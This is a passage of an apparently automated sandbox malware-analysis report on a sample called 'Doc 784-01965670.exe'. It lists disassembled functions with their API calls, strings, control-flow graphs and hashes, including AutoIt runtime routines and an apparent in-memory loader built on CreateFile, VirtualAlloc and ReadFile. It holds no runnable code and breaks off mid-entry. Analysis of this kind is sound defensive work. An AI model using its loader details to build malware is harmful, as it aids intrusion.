                                                                                                                                    • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                    • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                    • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                    • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                    Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                    • API String ID: 2574300362-3542929980
                                                                                                                                    • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                    • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                    • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                    • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                                    Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                    • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                    • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                      • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                    • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                    • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                    • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                    • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                    • API String ID: 1004883554-2276155026
                                                                                                                                    • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                    • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                    • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                    • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                                    Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                    • String ID: FILE
                                                                                                                                    • API String ID: 3888824918-3121273764
                                                                                                                                    • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                    • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                    • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                    • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                                                                    Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                    • RegisterClassExW.USER32 ref: 00410359
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                    • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00AD1B70,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                    • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                                    • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                                    • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                                    Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                    • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                      • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                                      • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                                      • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                                      • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                                      • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                                      • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                                      • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AD1B70,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$PGH
                                                                                                                                    • API String ID: 423443420-3673556320
                                                                                                                                    • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                    • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                                    • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                                    • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                                    Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • _fseek.LIBCMT ref: 004525DA
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                                    • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                                    • _fseek.LIBCMT ref: 0045267D
                                                                                                                                    • _malloc.LIBCMT ref: 00452689
                                                                                                                                    • _malloc.LIBCMT ref: 00452696
                                                                                                                                    • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1911931848-0
                                                                                                                                    • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                    • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                                    • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                                    • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                                                                    Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 228 40f450-40f45c call 425210 231 40f460-40f478 228->231 231->231 232 40f47a-40f4a8 call 413990 call 410f70 231->232 237 40f4b0-40f4d1 call 4151b0 232->237 240 40f531 237->240 241 40f4d3-40f4da 237->241 242 40f536-40f540 240->242 243 40f4dc-40f4de 241->243 244 40f4fd-40f517 call 41557c 241->244 246 40f4e0-40f4e2 243->246 247 40f51c-40f51f 244->247 248 40f4e6-40f4ed 246->248 247->237 249 40f521-40f52c 248->249 250 40f4ef-40f4f2 248->250 253 40f543-40f54e 249->253 254 40f52e-40f52f 249->254 251 42937a-4293a0 call 41557c call 4151b0 250->251 252 40f4f8-40f4fb 250->252 264 4293a5-4293c3 call 4151d0 251->264 252->244 252->246 256 40f550-40f553 253->256 257 40f555-40f560 253->257 254->250 256->250 259 429372 257->259 260 40f566-40f571 257->260 259->251 262 429361-429367 260->262 263 40f577-40f57a 260->263 262->248 265 42936d 262->265 263->250 264->242 265->259
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock_fseek_strcat
                                                                                                                                    • String ID: AU3!$EA06
                                                                                                                                    • API String ID: 3818483258-2658333250
                                                                                                                                    • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                    • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                                    • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                                    • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                                                                    Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 282->283 283->280
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                                    • String ID: C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                    • API String ID: 192938534-2756136957
                                                                                                                                    • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                    • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                                    • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                    • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                                    Function 03F94620 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 286 3f94620-3f946ce call 3f92050 289 3f946d5-3f946fb call 3f95530 CreateFileW 286->289 292 3f946fd 289->292 293 3f94702-3f94712 289->293 294 3f9484d-3f94851 292->294 298 3f94719-3f94733 VirtualAlloc 293->298 299 3f94714 293->299 295 3f94893-3f94896 294->295 296 3f94853-3f94857 294->296 300 3f94899-3f948a0 295->300 301 3f94859-3f9485c 296->301 302 3f94863-3f94867 296->302 303 3f9473a-3f94751 ReadFile 298->303 304 3f94735 298->304 299->294 305 3f948a2-3f948ad 300->305 306 3f948f5-3f9490a 300->306 301->302 307 3f94869-3f94873 302->307 308 3f94877-3f9487b 302->308 311 3f94758-3f94798 VirtualAlloc 303->311 312 3f94753 303->312 304->294 313 3f948af 305->313 314 3f948b1-3f948bd 305->314 315 3f9491a-3f94922 306->315 316 3f9490c-3f94917 VirtualFree 306->316 307->308 309 3f9488b 308->309 310 3f9487d-3f94887 308->310 309->295 310->309 317 3f9479a 311->317 318 3f9479f-3f947ba call 3f95780 311->318 312->294 313->306 319 3f948bf-3f948cf 314->319 320 3f948d1-3f948dd 314->320 316->315 317->294 326 3f947c5-3f947cf 318->326 322 3f948f3 319->322 323 3f948ea-3f948f0 320->323 324 3f948df-3f948e8 320->324 322->300 323->322 324->322 327 3f947d1-3f94800 call 3f95780 326->327 328 3f94802-3f94816 call 3f95590 326->328 327->326 333 3f94818 328->333 334 3f9481a-3f9481e 328->334 333->294 336 3f9482a-3f9482e 334->336 337 3f94820-3f94824 CloseHandle 334->337 338 3f9483e-3f94847 336->338 339 3f94830-3f9483b VirtualFree 336->339 337->336 338->289 338->294 339->338
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F946F1
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F94917
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                    • Instruction ID: eb135bfe7df7dd0870f4089946778f1abc7655c495d419b5e9b0e22aac50fb3c
                                                                                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                    • Instruction Fuzzy Hash: 3FA12774E00209EBEF14CFA5C994BEEBBB5BF58304F20819AE105BB280D7759A41CF94
                                                                                                                                    Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 340 414f10-414f2c 341 414f4f 340->341 342 414f2e-414f31 340->342 343 414f51-414f55 341->343 342->341 344 414f33-414f35 342->344 345 414f37-414f46 call 417f23 344->345 346 414f56-414f5b 344->346 356 414f47-414f4c call 417ebb 345->356 348 414f6a-414f6d 346->348 349 414f5d-414f68 346->349 352 414f7a-414f7c 348->352 353 414f6f-414f77 call 4131f0 348->353 349->348 351 414f8b-414f9e 349->351 354 414fa0-414fa6 351->354 355 414fa8 351->355 352->345 358 414f7e-414f89 352->358 353->352 359 414faf-414fb1 354->359 355->359 356->341 358->345 358->351 362 4150a1-4150a4 359->362 363 414fb7-414fbe 359->363 362->343 365 414fc0-414fc5 363->365 366 415004-415007 363->366 365->366 367 414fc7 365->367 368 415071-415072 call 41e6b1 366->368 369 415009-41500d 366->369 370 415102 367->370 371 414fcd-414fd1 367->371 382 415077-41507b 368->382 373 41500f-415018 369->373 374 41502e-415035 369->374 377 415106-41510f 370->377 380 414fd3 371->380 381 414fd5-414fd8 371->381 375 415023-415028 373->375 376 41501a-415021 373->376 378 415037 374->378 379 415039-41503c 374->379 384 41502a-41502c 375->384 376->384 377->343 378->379 385 415042-41504e call 41453a call 41ed9e 379->385 386 4150d5-4150d9 379->386 380->381 387 4150a9-4150af 381->387 388 414fde-414fff call 41ee9b 381->388 382->377 383 415081-415085 382->383 383->386 389 415087-415096 383->389 384->379 408 415053-415058 385->408 394 4150eb-4150fd call 417f23 386->394 395 4150db-4150e8 call 4131f0 386->395 390 4150b1-4150bd call 4131f0 387->390 391 4150c0-4150d0 call 417f23 387->391 397 415099-41509b 388->397 389->397 390->391 391->356 394->356 395->394 397->362 397->363 409 415114-415118 408->409 410 41505e-415061 408->410 409->377 410->370 411 415067-41506f 410->411 411->397
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3886058894-0
                                                                                                                                    • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                    • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                                    • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                    • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                                                                    Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • _memset.LIBCMT ref: 00401C62
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                    • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
